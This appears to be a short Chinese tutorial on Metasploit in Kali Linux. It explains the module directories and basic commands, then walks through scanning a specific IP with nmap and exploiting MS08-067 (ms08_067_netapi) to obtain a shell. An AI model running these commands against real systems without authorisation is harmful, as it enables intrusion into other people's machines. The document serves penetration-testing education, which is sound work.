1. 程式人生 > >kali漏洞利用之Metasploit實戰

kali漏洞利用之Metasploit實戰

Metasploit在滲透測試中經常被用到,實際上這套軟體包括了很多工具,這些工具組成了一個完整的攻擊框架。他們或許在滲透測試中的每一方面都不能稱為最好用的工具,但組合起來的框架卻讓它變得強大。

1.啟動服務:

在kali中使用metasploit,需要先開啟PostgreSQL資料庫服務和metasploit服務,然後就可以完整的利用msf資料庫查詢exploit和記錄
這裡寫圖片描述
2.路徑介紹

kali中,msf的路徑為/usr/share/metasploit-framework
這裡寫圖片描述
比如modules中,是我們在msf中經常會利用到的一些工具
這裡寫圖片描述
auxiliary:輔助模組

encoders:供msfencode編碼工具使用,具體可使用msfencode -l

exploits:攻擊模組,每個介紹msf的文章都會提到那個ms08_067_netapi,它就在這個目錄。

payloads:這裡面列出的是攻擊載荷,也就是攻擊成功後執行的程式碼。比如我們常設定的windows/meterpreter/reverse_tcp就在這個資料夾下。

post:後滲透階段模組,在獲得meterpreter的shell之後可以使用的攻擊程式碼。比如常用的hashdump,arp_scanner就在這裡。

3.基本命令

msfpayload:用來生成payload或者shellcode

搜尋的時候可以用msfpayload -l |grep “windows”這樣的命令查詢。

-o 選項可以列出payload所需的引數

msfencode:

msf中的編碼器,現在常用msfpayload與它編碼避免exploit的壞字串(比如00,會起到隔斷作用)

msfconsole:

開啟metasploit的console

4.測試示例:發現漏洞,搜尋exploit,先用nmap掃描主機,掃描命令

nmap -sS -sV -O --script=smb-check-vulns.nse -n 222.28.136.22

這裡寫圖片描述
可以看到,其中含有漏洞MS08-067

在console中搜索一下,可以看到下面的介面
這裡寫圖片描述
然後就use其中一個版本

use exploit/windows/smb/ms08_067_netapi

檢視一些引數
這裡寫圖片描述
可以看到RHOST(遠端IP地址)還沒有設定,這時我們就使用下面的命令來設定

set RHOST 222.28.136.22 

選擇payload
這裡寫圖片描述
設定好之後,就可以對目標進行攻擊測試,輸入exploit即可,如果成功,就會返回一個shell